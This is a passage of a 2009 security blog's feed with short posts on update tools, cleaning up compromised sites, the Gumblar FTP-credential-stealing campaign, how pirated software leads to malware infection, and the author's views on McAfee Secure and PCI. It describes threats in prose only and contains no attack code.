maintaining updates for their software. 
&lt;/span&gt;&lt;br /&gt;Check it out here (&lt;a href="http://www.filehippo.com/updatechecker/"&gt;LINK&lt;/a&gt;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-2926048821628593154?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/2926048821628593154/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=2926048821628593154' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2926048821628593154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2926048821628593154'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/file-hippo-update-checker-answer-to.html' title='File Hippo: Update Checker - The answer to keeping your workstation up to date.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_GV9ejoAirVk/SujFpE2fgII/AAAAAAAAAPU/cRtGQMBCvzs/s72-c/filehippo.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8965377702320410806</id><published>2009-10-26T11:00:00.000-07:00</published><updated>2009-10-26T11:05:51.886-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phishing'/><category scheme='http://www.blogger.com/atom/ns#' 
term='APWG'/><category scheme='http://www.blogger.com/atom/ns#' term='compromise'/><title type='text'>APWG: What to do if your website has been hacked by phishers.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_GV9ejoAirVk/SuXkzh_rAhI/AAAAAAAAAPE/dF4col2NSuQ/s1600-h/anti-malware.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 198px;" src="http://1.bp.blogspot.com/_GV9ejoAirVk/SuXkzh_rAhI/AAAAAAAAAPE/dF4col2NSuQ/s320/anti-malware.jpg" alt="" id="BLOGGER_PHOTO_ID_5396971302423298578" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The &lt;a href="http://www.antiphishing.org/"&gt;Anti-Phishing Working Group&lt;/a&gt; released a paper back in February that goes over what steps you should take if you or your website has been the victim of a phishing compromise.&lt;br /&gt;Check it out &lt;a href="http://www.antiphishing.org/reports/APWG_WTD_HackedWebsite.pdf"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-8965377702320410806?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8965377702320410806/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8965377702320410806' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8965377702320410806'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8965377702320410806'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/apwg-what-to-do-if-your-website-has.html' title='APWG: What to do if your website has been hacked 
by phishers.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_GV9ejoAirVk/SuXkzh_rAhI/AAAAAAAAAPE/dF4col2NSuQ/s72-c/anti-malware.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-592772426678650716</id><published>2009-10-23T14:31:00.000-07:00</published><updated>2009-10-23T14:34:30.186-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stop H Commerce'/><title type='text'>McAfee Stop H* Commerce NBC airings.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_GV9ejoAirVk/SuIg8d7sXYI/AAAAAAAAAO8/sYuJhKDKO8I/s1600-h/stophcommerce.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 410px; height: 177px;" src="http://2.bp.blogspot.com/_GV9ejoAirVk/SuIg8d7sXYI/AAAAAAAAAO8/sYuJhKDKO8I/s320/stophcommerce.JPG" alt="" id="BLOGGER_PHOTO_ID_5395911526742515074" border="0" /&gt;&lt;/a&gt;This is the broadcasting schedule for McAfee's Stop H*commerce mini movie.&lt;br /&gt;Check it out (&lt;a href="http://www.stophcommerce.com/"&gt;LINK&lt;/a&gt;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-592772426678650716?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/592772426678650716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=592772426678650716' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/592772426678650716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/592772426678650716'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/mcafee-stop-h-commerce-nbc-airings.html' title='McAfee Stop H* Commerce NBC airings.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_GV9ejoAirVk/SuIg8d7sXYI/AAAAAAAAAO8/sYuJhKDKO8I/s72-c/stophcommerce.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8275628387838080736</id><published>2009-10-23T09:42:00.000-07:00</published><updated>2009-10-23T09:45:09.795-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='compromise'/><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><title type='text'>Google:  Best practices for cleaning up a compromised site.</title><content type='html'>Yesterday, Google's Online Security Blog posted a nice, informative article on what steps you should take to prevent a compromise and to clean up a compromised website.&lt;br /&gt;Check it out here (&lt;a href="http://googleonlinesecurity.blogspot.com/2009/10/best-practices-for-verifying-and.html"&gt;LINK&lt;/a&gt;).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/1732826304675968996-8275628387838080736?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8275628387838080736/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8275628387838080736' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8275628387838080736'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8275628387838080736'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/google-best-practices-for-cleaning-up.html' title='Google:  Best practices for cleaning up a compromised site.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-3626773749958907255</id><published>2009-10-23T08:33:00.000-07:00</published><updated>2009-10-23T09:39:22.051-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Content Security Policy'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><title type='text'>The Return and Evolution of Gumblar</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/SuHcJofm_EI/AAAAAAAAAO0/hIju6r5MhqQ/s1600-h/passwordstealing.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 
213px; height: 320px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SuHcJofm_EI/AAAAAAAAAO0/hIju6r5MhqQ/s320/passwordstealing.jpg" alt="" id="BLOGGER_PHOTO_ID_5395835886613494850" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;So the new wave of Gumblar attacks is starting to come in at an alarming rate.  From where I sit, it is just as effective as any previous wave as far as the number of new compromises I have seen due to this highly successful trend.  Gumblar, using currently exploitable vulnerabilities in Adobe products, has made an impressive comeback after being quiet for a few weeks.  Attacking web developers' and site managers' local workstations, the malicious software installs a credential-sniffing application that looks for FTP login information and forwards this vital data to a destination of the hacker's preference.&lt;br /&gt;The new wave has evolved, placing the malicious JavaScript locally on the web server, making it more elusive and more difficult for the conventional user to detect. It also looks like the evolution is continuing, with all malicious links now pointing to legitimate websites that were infected with the malicious payload, to assist with fooling the user and evading detection by services such as Google Safe Browsing.  This to me is a huge step in the evolution of this malicious trend.   
With the success of these attacks, you start to realize that this particular trend of attack is not going to disappear any time soon, especially with new browser protection features being implemented such as the &lt;a href="http://people.mozilla.org/%7Ebsterne/content-security-policy/index.html"&gt;Content Security Policy&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I was going to provide a list of all the recent domains that the attackers are using; however, they are legitimate sites, and unless I point to the actual malicious script, it would be useless.&lt;br /&gt;&lt;br /&gt;In a quick closing, my steps to help prevent this particular type of attack still stand (&lt;a href="http://blog.igothacked.com/2009/06/steps-to-prevent-gumblar-martuz-nine.html"&gt;LINK&lt;/a&gt;).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-3626773749958907255?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/3626773749958907255/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=3626773749958907255' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3626773749958907255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3626773749958907255'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/return-and-evolution-of-gumblar.html' title='The Return and Evolution of Gumblar'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/SuHcJofm_EI/AAAAAAAAAO0/hIju6r5MhqQ/s72-c/passwordstealing.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-4000193535790229986</id><published>2009-10-16T07:47:00.000-07:00</published><updated>2009-10-16T07:57:10.187-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='McAfee HCommerce'/><title type='text'>H* Commerce:  October 18th on NBC right after NFL Sports Sunday</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_GV9ejoAirVk/StiJv-UQsyI/AAAAAAAAAOs/_zrUFOSD92U/s1600-h/hackinyou+%28Medium%29.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 285px; height: 320px;" src="http://2.bp.blogspot.com/_GV9ejoAirVk/StiJv-UQsyI/AAAAAAAAAOs/_zrUFOSD92U/s320/hackinyou+%28Medium%29.JPG" alt="" id="BLOGGER_PHOTO_ID_5393212011051004706" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;McAfee's multi-part mini movie on the Business of Hacking You is going to be shown on NBC on Sunday, October 18th.  This is actually a really good mini movie if you have not already seen it.  I wouldn't say that it would be super informative to security professionals, but it is put together really well and worth the watch.  
Check it out.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://stophcommerce.com/"&gt;McAfee Stop H* Commerce&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-4000193535790229986?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/4000193535790229986/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=4000193535790229986' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/4000193535790229986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/4000193535790229986'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/h-commerce-october-18th-on-nbc-right.html' title='H* Commerce:  October 18th on NBC right after NFL Sports Sunday'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_GV9ejoAirVk/StiJv-UQsyI/AAAAAAAAAOs/_zrUFOSD92U/s72-c/hackinyou+%28Medium%29.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-6354660169735584434</id><published>2009-10-15T09:46:00.000-07:00</published><updated>2009-10-15T10:56:11.622-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Pirated software and malware'/><title type='text'>The Software Piracy and Malware 
link</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/Stdha4kaMUI/AAAAAAAAAOc/kVseNbU1MyQ/s1600-h/genuine-advantage.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 199px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/Stdha4kaMUI/AAAAAAAAAOc/kVseNbU1MyQ/s320/genuine-advantage.jpg" alt="" id="BLOGGER_PHOTO_ID_5392886193289048386" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The latest post from Ryan Naraine and Dancho Danchev's blog Zero Day on &lt;a href="http://blogs.zdnet.com/security/?p=4605"&gt;software piracy leading to higher malware infection rates&lt;/a&gt; has sparked a small thread in my thought process.  For all who have ever downloaded pirated software (never myself, and never when I was in college), you can clearly understand the statistical information that is being described in the report.&lt;br /&gt;The reason for taking interest in this topic was the thought of how many different avenues there are for a victim to install malware by downloading pirated software.  As an example, I wanted to draft a possible scenario and all of the ways a malware infection could arise from it.&lt;br /&gt;&lt;br /&gt;User Bob decides to download a pirated copy of Microsoft Windows.  Bob knows what pirated software is, and is halfway familiar with the usual sharing tools such as torrents, LimeWire, IRC, Usenet, etc.  Bob decides to search in Google for something like "&lt;a href="http://www.google.com/#hl=en&amp;amp;q=windows+xp+black"&gt;windows XP black&lt;/a&gt;" (a popular pirated version of Windows XP).  Right off the bat, within the first 3 pages of Google's results are a dozen or so malicious sites that have been flagged for malicious use.  
Let's say Bob steers clear of the malicious sites and finds himself on a popular torrent site downloading an active torrent for the software.&lt;br /&gt;A couple of hours later, Bob has himself a .iso that he can burn to his favorite media and start the install process.  The unfortunate thing about this torrent is that a serial was not provided.  Bob steps over to his favorite keygen/serial site via his arsenal of pirated links or Google, and winds up with the possibility of being compromised with malware, either via the site the serial/keygen is hosted on or via the serial/keygen file itself.  Let's say for shits and giggles that Bob manages to steer clear of being infected with malware because, well, if he is doing a new install as opposed to an upgrade, what good is malware if it is only installed for an hour or so?&lt;br /&gt;&lt;br /&gt;As we continue, Bob is now installing his fresh new copy of Windows onto his local desktop or laptop.  Another potential for malware exists in the presence of malware in the pirated software itself, but let's say for the sake of blogging that this is not the case.  One other avenue for the potential existence or installation of malware is the fact that most pirated copies of Windows have Microsoft Update turned off by default and will never be updated with the latest security-related patches.  This issue might not exist right off the bat, because the installed copy could be up to date on the date of the install, but all future security-related issues will pose a problem for the software installed.&lt;br /&gt;Now on to my favorite: the installation of an antivirus.  Antivirus products are some of the most popular pirated software out there, and also some of the most prone to containing malicious software if downloaded illegally.  The reason is that if you are downloading an antivirus, then chances are you do not have one installed.  
This is the perfect opportunity (and possibly the last opportunity) for malware to sneak in under the radar without being detected.&lt;br /&gt;&lt;br /&gt;Whichever way you look at it (or get infected by it), downloading pirated software poses a great risk of installing malicious software.  Any avenue that takes you into an attacker-controlled domain sets up the potential risk of being infected.  Would I advise you not to download and install pirated software? That is not my problem.  However, I will always advise that if you would like to remain malware free, make sure that all of your software is legitimate and updated, and stay off of the third world of the internet (both of these rules are broken by downloading pirated software).  You are already at a high enough risk of being infected from legitimate sites that have themselves been infected.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-6354660169735584434?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/6354660169735584434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=6354660169735584434' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6354660169735584434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6354660169735584434'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/10/software-piracy-and-malware-link.html' title='The Software Piracy and Malware link'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/Stdha4kaMUI/AAAAAAAAAOc/kVseNbU1MyQ/s72-c/genuine-advantage.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-3071816777155476005</id><published>2009-09-02T08:31:00.000-07:00</published><updated>2009-09-02T11:57:27.155-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='payment CPayment Card Industry'/><category scheme='http://www.blogger.com/atom/ns#' term='McAfee Secure'/><category scheme='http://www.blogger.com/atom/ns#' term='James Lester'/><category scheme='http://www.blogger.com/atom/ns#' term='The Overall Picture'/><category scheme='http://www.blogger.com/atom/ns#' term='PCI'/><title type='text'>The Big Picture (At least my Opinion of it)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/Sp7AEPfv6JI/AAAAAAAAAMk/na2dZfDhZnY/s1600-h/full_jpg+%28Small%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 314px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/Sp7AEPfv6JI/AAAAAAAAAMk/na2dZfDhZnY/s320/full_jpg+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5376946184238655634" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;It's been a little hectic lately around the workplace, and I have been temporarily diverted from my daily tasks to help out on a few new issues.  This has caused me to be somewhat pulled away from the security front lines.  
Because of this, I wanted to create a post that is a little more opinionated and take a look at the big picture instead of focusing on recent trends or new discoveries.&lt;br /&gt;&lt;br /&gt;The inspiration for writing this post comes from a not-so-sober night in Vegas for DEF CON a couple of weeks ago.  While I was there I was able to meet up with a fellow peer and have a sloppy, unsober discussion on security.  I couldn't really tell you what we were discussing, but one part that stuck out in my mind was when I was called up to defend the product I work for (again). I am not saying that I fully agree with the development of my product, because I am on the security side of things and will always take a security standpoint on the product discussion and its issues.  Working here, having discussions with our product manager, and understanding the role of business has definitely led me to a better understanding that what is best for the product might not be best for business, and vice versa.  I know that is a vague statement, but I will leave it at that (and that is another discussion in itself).&lt;br /&gt;Now back to our intoxicating night in Vegas: the statement that has stuck with me came when I was explaining the &lt;a href="http://www.mcafeesecure.com/"&gt;McAfee Secure&lt;/a&gt; product and how I truly believe that we are doing a large part in increasing the security of e-commerce websites on the internet.  I honestly believed that the McAfee Secure product does make a difference in the overall big picture of security, and I brought up the example of SQL injection.  I did not disclose numbers (frankly because they would be hard to calculate), but I expressed my belief that the McAfee Secure product has disclosed thousands and thousands of exploitable SQL injection vectors and that an incredibly large majority of those have been remediated (at least 99%).  
I feel that since the creation of McAfee Secure (originally ScanAlert) in 2001, the product itself has made as much of an impact as any other security scanning solution out there.  I have never gone out and researched this, but I do not really feel that it is necessary, because it is purely my opinion.&lt;br /&gt;The part that really made this discussion stick in my mind is the response: "I have a lot of trouble believing that."  There is nothing wrong with this response, and honestly it is coming from a peer that I respect (and I am sure he will most likely read this post).  What got me was that I do feel there is a huge misunderstanding, and the belief that a product such as McAfee Secure is a worthless security product or does not provide an effective security solution.&lt;br /&gt;&lt;br /&gt;I am not going to touch on why I do not agree with this opinion or why I believe that this opinion has formed (because I like to keep my posts neutral).  What I do wish to say is that it seems to be a common thing out there in the world of security.  It seems that size, success, standards, understanding, goals, marketing, etc. all have a place in determining whether a product is successful as a security solution or not.&lt;br /&gt;&lt;br /&gt;Now the BIG PICTURE.  Where does this all come in?  Well, for me, it all fits together in the overall understanding of the &lt;a href="http://www.pcisecuritystandards.org/"&gt;PCI Security Council&lt;/a&gt; and the feat ahead of them.  Or the major financial institutions or major e-commerce websites that are attempting to attack security on a daily basis.  Or how difficult it might be to build and maintain a security solution given that there are now security issues that might not have been an issue when the company/product was first created.  I will leave all of these issues and solutions to your own opinion.  We all face challenges in security and in making the internet a safer place. 
We all have difficulty in understanding other businesses' practices and their methods of achieving success in security.  We have all heard the question of how you make a network (or internet) that was never designed to handle security controls into a more secure environment.&lt;br /&gt;&lt;br /&gt;In closing, after the last few months of complaining about PCI and their method of delivering an effective security solution to e-commerce, I have come to settle down and give them a little credit for trying to accomplish such a difficult task without having a large impact on the functionality of e-commerce itself.  I do believe that their product is making an impact, and although it is not the method that I would run with, it is becoming more and more effective and gaining ground an inch at a time.&lt;br /&gt;&lt;br /&gt;That is just my opinion, and I'll let your own opinions run with this.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-3071816777155476005?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/3071816777155476005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=3071816777155476005' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3071816777155476005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/3071816777155476005'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/09/big-picture-at-least-my-opinion-of-it.html' title='The Big Picture (At least my Opinion of 
it)'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_GV9ejoAirVk/Sp7AEPfv6JI/AAAAAAAAAMk/na2dZfDhZnY/s72-c/full_jpg+%28Small%29.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7103461508914815745</id><published>2009-08-27T10:24:00.000-07:00</published><updated>2009-09-02T12:11:00.636-07:00</updated><title type='text'>An Update</title><content type='html'>I just wanted to give a quick post.  I have a couple of personal things on my plate that are stealing focus from being able to post here.&lt;br /&gt;Hopefully next week I will be able to take some time to do some write-ups that I have been hovering over lately.&lt;br /&gt;&lt;br /&gt;While I'm at it:&lt;br /&gt;Check out &lt;a href="http://www.securitytube.net/"&gt;www.securitytube.net&lt;/a&gt;.  Cool site and great tutorials.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7103461508914815745?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7103461508914815745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7103461508914815745' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7103461508914815745'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7103461508914815745'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/08/update.html' title='An Update'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8973604151874682416</id><published>2009-08-05T10:25:00.000-07:00</published><updated>2009-08-11T09:42:12.292-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stop H Commerce'/><category scheme='http://www.blogger.com/atom/ns#' term='McAfee HCommerce'/><title type='text'>Stop H* Commerce series is finally complete.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_GV9ejoAirVk/SnnDj_lpXMI/AAAAAAAAAMI/JQPFrieyMQ4/s1600-h/stop-h-commerce-01.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 202px;" src="http://4.bp.blogspot.com/_GV9ejoAirVk/SnnDj_lpXMI/AAAAAAAAAMI/JQPFrieyMQ4/s320/stop-h-commerce-01.jpg" alt="" id="BLOGGER_PHOTO_ID_5366535454120828098" border="0" /&gt;&lt;/a&gt;McAfee has released all of the episodes of the Stop H* Commerce series.    This is truly a great mini-flick to watch.  I highly recommend it to anyone in the industry.  
